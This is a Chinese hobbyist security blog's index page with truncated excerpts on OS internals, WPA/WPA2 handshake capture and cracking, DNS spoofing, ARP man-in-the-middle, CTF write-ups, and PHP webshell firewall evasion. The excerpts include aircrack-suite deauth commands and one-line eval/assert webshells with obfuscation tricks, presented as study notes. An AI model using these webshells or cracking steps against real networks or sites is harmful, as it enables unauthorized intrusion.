theKingOfNight's Blog

theKingOfNight's Blog

Don't work hard, how do you know that you are not a waste?

浅谈操作系统是如何管理CPU的
CPU的工作原理12341.将一个程序放在内存中,然后设置一个地址2.cpu根据地址发出取指指令,将设置的地址中的指令放在地址总线上,将该指令传到CPU中3.CPU开始解释执行该指令 4.地址自动累加,看取一条指令,执行一条指令 tips12io指令与正常指令的执行时间比为570000:1(电脑不同可能比值不同,不过还是很大)大部分时间都在读取数据(io操作),意味着CPU几乎是空闲的 如何让CPU忙碌起来??12多个程序,交替执行(并发)切换的时候记录信息,切时程序的样子。 如何查看电脑中的进程1打开任务管理器就能看到有多少进程,每一个程序都会开启一个进程 多进程如何组织(操作系统组...
浅谈操作系统是如何启动的
如何在屏幕上输出hello world?121.CPU发送指令(将ASCII放在显示器上)(通过CPU-内存总线)给内存2.内存->CPU-内存总线传输数据到总线控制器->再到图形控制器->输出到屏幕 什么是操作系统123我们的操作系统是从: 应用软件->操作系统接口->操作系统->计算机硬件 操作系统是在计算机硬件的“衣服”,方便人操作硬件,管理几乎所有的硬件 电脑是如何启动的(1.读入内存2.初始化)123456789 X86打开时,CS=0xFFFF,IP=0x0000寻址:CS:IP 0xFFFF0(开机时唯一有代码的地方ROM B...
Hack-WPA/WPA2-WIFI
1airmon-ng start wlan0 杀掉其他的PID1airmon-ng check kill 开始监听 theKingOfNight就是我开的wifi,channel为1 开始捕捉握手包 -c 参数为频道,-w为写入的文件1airodump-ng -c 1 -w /root/Desktop/ --bssid 90:94:97:8B:F0:F4 wlan0mon 同时我们需要向wifi发送DeAuth的包,是为了使链接wifi的用户强制断开。1aireplay-ng -0 0 -a XX:XX:XX:XX:XX(WIFIMAC地址) wlan0mon 现在我们就等待用户...
DNS欺骗
DNS服务器记录域名所对应的ip,全球总共有13个根域名服务器。以访问www.anquanke.com为例 理论基础12345在浏览器的搜索栏输入www.anquanke.com1.先查询本地host文件,检测www.anquanke.com有没有对应ip,如果有,直接访问ip,否则进行后续步骤2.浏览器然后向DNS服务器(网关或者真正的DNS服务器)发送一个包3.DNS服务器返回对应的ip地址3.浏览器去访问对应ip 环境123默认网关:192.168.230.2攻击者ip:192.168.230.128示例局域网中主机ip:192.168.230.133 同一局域网dns欺骗未开始攻...
中间人攻击--Middle_Attack
理论基础现在的计算机中都会维持一张arp表12大约每5分钟,arp表更新一次。如果每5分钟相邻主机有变换或者arp请求有变换,则arp表更新 123网关:192.168.230.2攻击主机:192.168.230.128目标主机:192.168.230.133 1234567tips以上述三种主机为例攻击主机疯狂的向网关说我的ip是192.168.230.133攻击主机疯狂的和目标主机说我是网关然后网关的arp表会将攻击主机当做目标主机目标主机会将攻击主机当做网关 环境配置使用工具ettercap(kali自带) 配置121.修改配置文件vi /etc/ettercap/etter....
PHP-Code-Breaking-Puzzles-easy学习篇
代码审计知识星球二周年,P牛出了几道质量相当贼很高的题目,个人实力比较菜,这里记录一哈复现收获,当然也欢迎加入【代码审计】知识星球,一起进步。介绍具体可以看这里。 题目链接1https://code-breaking.com/#promo-block 题目考点1234567891.function PHP函数利用技巧(create_function)2.pcrewaf PHP正则特性3.phpmagic PHP写文件技巧4.phplimit PHP代码执行限制绕过5.nodechr Javascript字符串特性6.javacon SPEL表达式沙盒绕过7.lumenserial 反序列...
PHP-HCTF两道web题目
HCTF WEB wp官方Writeup: [https://bysec.io/hctf/writeup.html]所有源码: [https://github.com/vidar-team/HCTF2018] HCTF的题目总体来说相当不错,部分题目质量很高,同时也有很多我没有考虑到的地方,这里记录一哈学习笔记。 hide and seek这道题目质量相当不错,来源于实际。Descriptiononly admin can get it update1/更新1: 1. fix bugs 2. attention: you may need to restart all your work...
PHP-2018上海大学生两道代码审计题目
放假抽空和同学打了一哈上海大学生的ctf,题目质量一般,脑洞太大,不过有两道代码审计题目还是不错的,同时自己也有好多点没有考虑到,这里记录一哈学习经验。 web2序列化与反序列化php所有的值都可以使用serialize()来存储数据,输出一串字符串。unserialize()将字符串内包含的数据进行返回。序列化一个对象(类的实例),不会保存类的方法(所以一般情况只能去找类的漏洞)。 魔术方法PHP 中所有以 __(两个下划线)开头的类方法保留为魔术方法。常用的魔术方法有1234__construct(), __destruct(), __call(), __callStatic(), ...
PHP-HITCON2017-babyfirst-revenge&BabyFirst-Revenge-v2复现
HITCON2017的题好难,同时对linux一无所知,这里复现哈,而且这里主要参考wp进行慢慢理解题目,学到了好多东西。 babyfirst-revenge分值:200分 类型:Web题目名称:babyfirst-revengehitcon2017丧心病狂的命令执行http://117.50.3.97:800112345678910<?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); //根据用户的ip地址 @m...
PHP-PHP过狗
菜刀中的php木马为123<?php@eval($_POST[key])?> 现在的waf对eval审查比较严格,采用assert替换。123<?php@assert($_POST[key]);?> 其他的一些思路1.assert可以分割为123$b='a'.'s'.'s'.'e'.'r'.'t'//利用php特性$b($_POST[key]); 可以达到上述目的,现在狗可以查出来。2.颠倒123$b='tressa';$c=...
avatar
theKingOfNight
Deliberate learning is more important than extensive learning !